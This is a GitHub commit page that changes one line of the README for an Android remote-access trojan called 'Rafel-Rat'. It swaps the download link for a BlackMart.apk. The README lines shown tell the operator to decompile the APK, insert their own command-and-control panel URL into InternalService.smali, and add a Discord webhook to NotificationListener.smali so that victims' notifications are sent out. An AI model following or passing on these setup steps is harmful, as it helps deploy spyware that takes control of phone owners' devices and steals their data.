Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
swagkarna authored Dec 26, 2021
1 parent c1eb5a5 commit db44442
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -55,7 +55,7 @@ OR
---
### Building Apk with ApkEasyTool:

1. Download <a href="https://github.com/swagkarna/Rafel-Rat/releases/download/Blackmart/BlackMart.apk">BlackMartapk</a> and decompile with `Apktool` and navigate to `smali_classes2\com\velociraptor\raptor`
1. Download <a href="https://github.com/swagkarna/Rafel-Rat/releases/download/release/BlackMart.apk">BlackMartapk</a> and decompile with `Apktool` and navigate to `smali_classes2\com\velociraptor\raptor`
2. Open `InternalService.smali`
3. Replace this with your Panel Url ***const-string v0, "https://your-webpanel-url/public/commands.php"***
4. Now open `NotificationListener.smali` and enter replace with your discord webhook url
Expand Down

0 comments on commit db44442

Please sign in to comment.